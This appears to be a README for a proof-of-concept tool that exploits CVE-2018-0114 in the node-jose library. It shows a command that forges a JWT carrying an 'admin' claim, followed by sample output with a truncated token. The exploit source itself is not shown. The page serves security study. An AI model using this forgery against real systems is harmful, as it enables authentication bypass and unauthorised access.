CVE-2018-0114 PoC — Cisco node-jose open source library 数据伪造问题漏洞

介绍

# CVE-2018-0114 Proof of Concept

Reference: [CVE-2018-0114](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0114)

**Note:** For educational purposes only.

To generate a JWT with the claim "admin", run the following command in the project directory:

```sh
go run . --claim=admin
```

```sh
____       __  __     ____                  ___        __        _        __                 __        _        _      __ __
/\  _`\    /\ \/\ \   /\  _`\              /'___`\    /'__`\    /' \     /'_ `\             /'__`\    /' \     /' \    /\ \\ \
\ \ \/\_\  \ \ \ \ \  \ \ \L\_\           /\_\ /\ \  /\ \/\ \  /\_, \   /\ \L\ \           /\ \/\ \  /\_, \   /\_, \   \ \ \\ \
\ \ \/_/_  \ \ \ \ \  \ \  _\L   _______ \/_/// /__ \ \ \ \ \ \/_/\ \  \/_> _ <_  _______ \ \ \ \ \ \/_/\ \  \/_/\ \   \ \ \\ \_
 \ \ \L\ \  \ \ \_/ \  \ \ \L\ \/\______\   // /_\ \ \ \ \_\ \   \ \ \   /\ \L\ \/\______\ \ \ \_\ \   \ \ \    \ \ \   \ \__ ,__\
  \ \____/   \ `\___/   \ \____/\/______/  /\______/  \ \____/    \ \_\  \ \____/\/______/  \ \____/    \ \_\    \ \_\   \/_/\_\_/
   \/___/     `\/__/     \/___/            \/_____/    \/___/      \/_/   \/___/             \/___/      \/_/     \/_/      \/_/


[x] Generating JWT with payload "admin" ...
[x] Keys Generated
[x] Signature Signed

eyJhbGciOiJSUzI1NiIsI.......
```

文件快照

备注